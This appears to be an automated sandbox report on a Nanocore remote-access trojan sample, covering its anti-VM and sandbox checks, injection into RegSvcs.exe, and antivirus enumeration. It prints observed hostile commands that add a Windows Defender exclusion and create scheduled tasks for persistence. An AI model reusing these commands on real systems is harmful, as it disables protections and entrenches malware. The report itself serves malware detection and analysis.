      Malware Analysis System Evasion

      barindex
      Yara detected AntiVM3
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.2451b94.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.2459ba0.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: plugmancdht5461.exe, 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
      Source: plugmancdht5461.exe, 00000004.00000002.433210954.00000000024B4000.00000004.00000800.00020000.00000000.sdmp, plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1180Thread sleep time: -240000s >= -30000s
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exe TID: 196Thread sleep time: -33428s >= -30000s
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exe TID: 1868Thread sleep time: -60000s >= -30000s
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exe TID: 2124Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\taskeng.exe TID: 200Thread sleep time: -60000s >= -30000s
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2160Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 1160Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1364
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8386
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_005A410E sldt word ptr [eax]
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeThread delayed: delay time: 33428
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
      Source: plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
      Source: plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
      Source: plugmancdht5461.exe, 00000004.00000002.434837360.00000000051B0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: plugmancdht5461.exe, 00000004.00000002.433106476.0000000002441000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess information queried: ProcessInformation
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess token adjusted: Debug
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Allocates memory in foreign processes
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
      Adds a directory exclusion to Windows Defender
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe
      Writes to foreign memory regions
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 420000
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\plugmancdht5461.exe C:\Users\user\AppData\Roaming\plugmancdht5461.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZdNnwVcb.exe
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZdNnwVcb" /XML "C:\Users\user\AppData\Local\Temp\tmp41F1.tmp
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service" /xml "C:\Users\user\AppData\Local\Temp\tmpA9E2.tmp
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "SMTP Service Task" /xml "C:\Users\user\AppData\Local\Temp\tmp9E5E.tmp
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe 0
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe "C:\Program Files (x86)\SMTP Service\smtpsvc.exe" 0
      Source: RegSvcs.exe, 00000009.00000002.694392047.0000000006C4E000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694332477.00000000068BE000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694133289.000000000609C000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694441123.0000000006FBE000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694510504.00000000074DF000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694448443.000000000710C000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694418566.0000000006DAE000.00000004.00000010.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.694496396.00000000073DC000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: nO1`i1`Program Manager
      Source: RegSvcs.exe, 00000009.00000002.691150726.0000000002772000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691415902.000000000298C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691342924.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691121698.0000000002730000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691311825.00000000028A2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691644184.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691172158.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691260322.000000000282B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691366029.0000000002922000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691267382.0000000002830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager48
      Source: RegSvcs.exe, 00000009.00000002.691150726.0000000002772000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691415902.000000000298C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691342924.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691121698.0000000002730000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691311825.00000000028A2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691644184.0000000002BEA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691172158.00000000027A0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691638167.0000000002BE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691260322.000000000282B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691366029.0000000002922000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.691267382.0000000002830000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: RegSvcs.exe, 00000009.00000002.691415902.000000000298C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeQueries volume information: C:\Users\user\AppData\Roaming\plugmancdht5461.exe VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
      Source: C:\Users\user\AppData\Roaming\plugmancdht5461.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - SELECT DisplayName FROM FirewallProduct

      Stealing of Sensitive Information

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a4629.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.364b35e.19.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.4.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.5a0000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.36547bd.18.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 9.2.RegSvcs.exe.3650194.17.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36a90a8.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 4.2.plugmancdht5461.exe.36dbcc8.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431645306.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.431151202.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.690522664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000000.430896595.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000009.00000002.691704162.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: plugmancdht5461.exe PID: 848, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 788, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Detected Nanocore Rat
      Source: plugmancdht5461.exe, 00000004.00000002.433826666.00000000036A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690626467.00000000005A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690947097.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.690947097.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000009.00000000.431404895.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000009.00000002.691048568.000000000266B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: 